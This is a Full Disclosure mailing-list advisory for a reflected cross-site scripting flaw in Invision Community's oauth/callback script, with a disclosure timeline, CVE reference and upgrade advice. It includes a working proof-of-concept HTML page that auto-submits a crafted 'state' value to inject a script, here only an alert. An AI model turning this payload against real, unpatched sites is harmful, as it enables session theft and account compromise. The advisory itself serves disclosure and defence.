----------------------------------------------------------------------------------------- Invision Community <= 5.0.7 (oauth/callback) Reflected Cross-Site Scripting Vulnerability -----------------------------------------------------------------------------------------
[-] Software Link: https://invisioncommunity.com [-] Affected Versions: Certain 4.x versions before 4.7.21. All 5.x versions before 5.0.8. [-] Vulnerability Description: User input passed through the "state" POST parameter to the /oauth/callback/index.php script is not properly sanitized before being used to generate HTML output. This can be exploited by attackers to perform Reflected Cross-Site Scripting (XSS) attacks. [-] Proof of Concept: The vulnerability can be exploited by tricking a victim user into opening an HTML page like the following: <html> <form method="POST"> <input type="hidden" name="state" /> </form> <script> var target = "https://invisioncommunity.com/forums/";; var form = document.forms[0]; form.action = target + "oauth/callback/index.php"; form.childNodes[1].value = '1-' + btoa(target) + '-2-"><script>alert("XSS on "+document.domain)<\/script>'; form.submit(); </script> </html> [-] Solution: Upgrade to version 4.7.21, 5.0.8, or later. [-] Disclosure Timeline: [16/05/2025] - Vendor notified [27/05/2025] - Version 4.7.21 released [28/05/2025] - Version 5.0.8 released [28/05/2025] - CVE identifier requested [28/05/2025] - CVE identifier assigned [23/07/2025] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures program (cve.org) has assigned the name CVE-2025-48933 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Original Advisory: http://karmainsecurity.com/KIS-2025-05 _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
